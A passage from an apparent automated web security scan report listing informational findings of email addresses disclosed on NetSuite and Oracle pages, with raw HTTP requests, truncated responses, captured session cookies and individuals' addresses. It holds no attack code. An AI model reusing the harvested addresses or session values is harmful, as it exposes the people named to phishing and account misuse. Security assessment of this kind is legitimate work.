(function(b,gb){var v="none",t="click",N="LoadedContent",d=false,x="resize.",o="y",u="auto",f=true,M="nofollow",
...[SNIP]...

22.50. http://www.netsuite.com/portal/javascript/jquery.colorbox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/javascript/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /portal/javascript/jquery.colorbox.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343323|PC#1315341135013-154927.19#1316551063|check#true#1315341523

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 24023
Content-Disposition: inline;filename="jquery.colorbox.js"
NS_RTIMER_COMPOSITE: 233090667:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: max-age=3061
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
Vary: Accept-Encoding

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, window) {
   
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colorbox for
...[SNIP]...

22.51. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/bangladesh-316183-en-as.html

Issue detail

The following email addresses were disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM
aon.ali.siddiqui@oracle.com
karahman@ibcs-primax.com

Request

GET /as/corporate/contact/bangladesh-316183-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41186041698052273,0:1)
Date: Tue, 06 Sep 2011 16:16:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_LK@ORACLE.COM">SALESINQUIRY_LK@ORACLE.COM</a>
...[SNIP]...
<a class="bodylink" href="mailto:aon.ali.siddiqui@oracle.com">aon.ali.siddiqui@oracle.com</a>
...[SNIP]...
<br />
karahman@ibcs-primax.com</p>
...[SNIP]...
<br />
karahman@ibcs-primax.com<br />
...[SNIP]...

22.52. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/bhutan-316187-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM

Request

GET /as/corporate/contact/bhutan-316187-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35763838760381153,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_LK@ORACLE.COM">SALESINQUIRY_LK@ORACLE.COM</a>
...[SNIP]...

22.53. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/brunei-316198-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_MY@ORACLE.COM

Request

GET /as/corporate/contact/brunei-316198-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=36013329115639045,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_MY@ORACLE.COM">SALESINQUIRY_MY@ORACLE.COM</a>
...[SNIP]...

22.54. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/cambodia-316193-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_VN@ORACLE.COM

Request

GET /as/corporate/contact/cambodia-316193-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41170936298073964,0:1)
Date: Tue, 06 Sep 2011 16:17:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_VN@ORACLE.COM">SALESINQUIRY_VN@ORACLE.COM</a>
...[SNIP]...

22.55. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/laos-316260-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_VN@ORACLE.COM

Request

GET /as/corporate/contact/laos-316260-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41186217791713760,0:1)
Date: Tue, 06 Sep 2011 16:17:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_VN@ORACLE.COM">SALESINQUIRY_VN@ORACLE.COM</a>
...[SNIP]...

22.56. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/maldives-316209-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM

Request

GET /as/corporate/contact/maldives-316209-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35764036328879253,0:1)
Date: Tue, 06 Sep 2011 16:17:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_LK@ORACLE.COM">SALESINQUIRY_LK@ORACLE.COM</a>
...[SNIP]...

22.57. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/nepal-316215-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_LK@ORACLE.COM

Request

GET /as/corporate/contact/nepal-316215-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41171065147094656,0:1)
Date: Tue, 06 Sep 2011 16:17:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_LK@ORACLE.COM">SALESINQUIRY_LK@ORACLE.COM</a>
...[SNIP]...

22.58. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/pakistan-316185-en-as.html

Issue detail

The following email address was disclosed in the response:

SALESINQUIRY_PK@ORACLE.COM

Request

GET /as/corporate/contact/pakistan-316185-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41104347125119295,0:1)
Date: Tue, 06 Sep 2011 16:17:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:SALESINQUIRY_PK@ORACLE.COM">SALESINQUIRY_PK@ORACLE.COM</a>
...[SNIP]...

22.59. http://www.oracle.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/sitemaps/sitemaps.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342466942; gpv_p24=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone; gpw_e24=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone; s_sq=oracleglobal%2Coraclecom%2Coracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 31 Aug 2011 13:57:01 GMT
ETag: "ad6050-75f4-4abcd80990540"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=234;ecid=11704818704187611,0:1)
Content-Length: 30196
Date: Tue, 06 Sep 2011 15:54:27 GMT
Connection: close

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.60. http://www.oracle.com/openworld/contact/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/contact/index.html

Issue detail

The following email addresses were disclosed in the response:

OpenWorldReg@gpj.com
OpenWorldHousing@gpj.com
OpenWorldExhibitor@gpj.com
amy.loskutoff@oracle.com
openworldpartner_us@oracle.com
OpenWorldContent@gpj.com

Request

GET /openworld/contact/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/tools/mobile/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342700612; s_wgw_lv_s=First%20Visit; s_nr6=1315342700613-New; s_nr=1315342700893; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Fmobile%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Fcontact%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=282;ecid=41029782196745490,0:1)
Content-Length: 42391
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:58:21 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
<a href="mailto:OpenWorldReg@gpj.com">OpenWorldReg@gpj.com</a>
...[SNIP]...
<a href="mailto:OpenWorldHousing@gpj.com">OpenWorldHousing@gpj.com</a>
...[SNIP]...
<a href="mailto:OpenWorldExhibitor@gpj.com">OpenWorldExhibitor@gpj.com</a>
...[SNIP]...
<a href="mailto:amy.loskutoff@oracle.com">amy.loskutoff@oracle.com</a>
...[SNIP]...
<a href="mailto:openworldpartner_us@oracle.com">openworldpartner_us@oracle.com</a>
...[SNIP]...
<a href="mailto:OpenWorldContent@gpj.com">OpenWorldContent@gpj.com</a>
...[SNIP]...

22.61. http://www.oracle.com/openworld/register/packages/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/register/packages/index.html

Issue detail

The following email address was disclosed in the response:

OpenWorldReg@gpj.com

Request

GET /openworld/register/packages/index.html?src=7013425&Act=226 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=7013425&Act=226&pcode=WWMK10042957MPP055&refer=http%3A//www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342445639; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahpf4%25253Aregister%252520now%252520for%252520oracle%252520openworld%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=299;ecid=35672222811585456,0:1)
Content-Length: 49483
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:07 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
<a href="mailto:OpenWorldReg@gpj.com">OpenWorldReg@gpj.com</a>
...[SNIP]...
<a href="mailto:OpenWorldReg@gpj.com">OpenWorldReg@gpj.com</a>
...[SNIP]...

22.62. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/opn-program/membership-resources/business-center/index.html

Issue detail

The following email addresses were disclosed in the response (each listed once, in order of first appearance):

partnerbusinesscenter-al_ww@oracle.com
partnerbusinesscenter-ao_ww@oracle.com
partnerbusinesscenter-sadc_ww@oracle.com
partnerbusinesscenter-dsur_ww@oracle.com
partnerbusinesscenter-tr_ww@oracle.com
partnerbusinesscenter-cari_ww@oracle.com
partnerbusinesscenter-aunz_ww@oracle.com
partnerbusinesscenter-at_ww@oracle.com
partnerbusinesscenter-gs_ww@oracle.com
partnerbusinesscenter-asea_ww@oracle.com
partnerbusinesscenter-ru_ww@oracle.com
partnerbusinesscenter-be_ww@oracle.com
partnerbusinesscenter-cr_ww@oracle.com
partnerbusinesscenter-ba_ww@oracle.com
partnerbusinesscenter-br_ww@oracle.com
partnerbusinesscenter-bg_ww@oracle.com
partnerbusinesscenter-nas_ww@oracle.com
partnerbusinesscenter-cl_ww@oracle.com
partnerbusinesscenter-cn_ww@oracle.com
partnerbusinesscenter-co_ww@oracle.com
partnerbusinesscenter-hr_ww@oracle.com
partnerbusinesscenter-cy_ww@oracle.com
partnerbusinesscenter-cz_ww@oracle.com
partnerbusinesscenter-dk_ww@oracle.com
partnerbusinesscenter-ec_ww@oracle.com
partnerbusinesscenter-egsa_ww@oracle.com
partnerbusinesscenter-ee_ww@oracle.com
partnerbusinesscenter-fi_ww@oracle.com
partnerbusinesscenter-fr_ww@oracle.com
partnerbusinesscenter-de_ww@oracle.com
partnerbusinesscenter-gr_ww@oracle.com
partnerbusinesscenter-hk_ww@oracle.com
partnerbusinesscenter-hu_ww@oracle.com
partnerbusinesscenter-in_ww@oracle.com
partnerbusinesscenter-id_ww@oracle.com
partnerbusinesscenter-ie_ww@oracle.com
partnerbusinesscenter-it_ww@oracle.com
opn-office_jp@oracle.com
partnerbusinesscenter-kz_ww@oracle.com
partnerbusinesscenter-kr_ww@oracle.com
partnerbusinesscenter-lv_ww@oracle.com
partnerbusinesscenter-lt_ww@oracle.com
partnerbusinesscenter-lu_ww@oracle.com
partnerbusinesscenter-mk_ww@oracle.com
partnerbusinesscenter-my_ww@oracle.com
partnerbusinesscenter-mt_ww@oracle.com
partnerbusinesscenter-mx_ww@oracle.com
partnerbusinesscenter-ua_ww@oracle.com
partnerbusinesscenter-nl_ww@oracle.com
partnerbusinesscenter-no_ww@oracle.com
partnerbusinesscenter-pe_ww@oracle.com
partnerbusinesscenter-ph_ww@oracle.com
partnerbusinesscenter-pl_ww@oracle.com
partnerbusinesscenter-pt_ww@oracle.com
partnerbusinesscenter-ro_ww@oracle.com
partnerbusinesscenter-rs_ww@oracle.com
partnerbusinesscenter-sg_ww@oracle.com
partnerbusinesscenter-sk_ww@oracle.com
partnerbusinesscenter-si_ww@oracle.com
partnerbusinesscenter-es_ww@oracle.com
partnerbusinesscenter-se_ww@oracle.com
partnerbusinesscenter-chde_ww@oracle.com
partnerbusinesscenter-chfr_ww@oracle.com
partnerbusinesscenter-tw_ww@oracle.com
partnerbusinesscenter-th_ww@oracle.com
partnerbusinesscenter-uk_ww@oracle.com
partnerbusinesscenter-ve_ww@oracle.com
partnerbusinesscenter-vn_ww@oracle.com

Request

GET /partners/en/opn-program/membership-resources/business-center/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41071516394601635,0:1)
Date: Tue, 06 Sep 2011 16:08:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 249980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<a href="mailto:partnerbusinesscenter-al_ww@oracle.com">partnerbusinesscenter-al_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-aunz_ww@oracle.com">partnerbusinesscenter-aunz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-at_ww@oracle.com">partnerbusinesscenter-at_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-tr_ww@oracle.com">partnerbusinesscenter-tr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-gs_ww@oracle.com">partnerbusinesscenter-gs_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ru_ww@oracle.com">partnerbusinesscenter-ru_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-be_ww@oracle.com">partnerbusinesscenter-be_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cari_ww@oracle.com">partnerbusinesscenter-cari_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-dsur_ww@oracle.com">partnerbusinesscenter-dsur_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ba_ww@oracle.com">partnerbusinesscenter-ba_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-sadc_ww@oracle.com">partnerbusinesscenter-sadc_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-br_ww@oracle.com">partnerbusinesscenter-br_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-bg_ww@oracle.com">partnerbusinesscenter-bg_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-asea_ww@oracle.com">partnerbusinesscenter-asea_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-nas_ww@oracle.com">partnerbusinesscenter-nas_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cl_ww@oracle.com">partnerbusinesscenter-cl_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cn_ww@oracle.com">partnerbusinesscenter-cn_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-co_ww@oracle.com">partnerbusinesscenter-co_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cr_ww@oracle.com">partnerbusinesscenter-cr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-hr_ww@oracle.com">partnerbusinesscenter-hr_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cy_ww@oracle.com">partnerbusinesscenter-cy_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-cz_ww@oracle.com">partnerbusinesscenter-cz_ww@oracle.com</a>
...[SNIP]...
<a href="mailto:partnerbusinesscenter-ao_ww@oracle.com">partnerbusinesscenter-ao_ww@oracle.com</a>
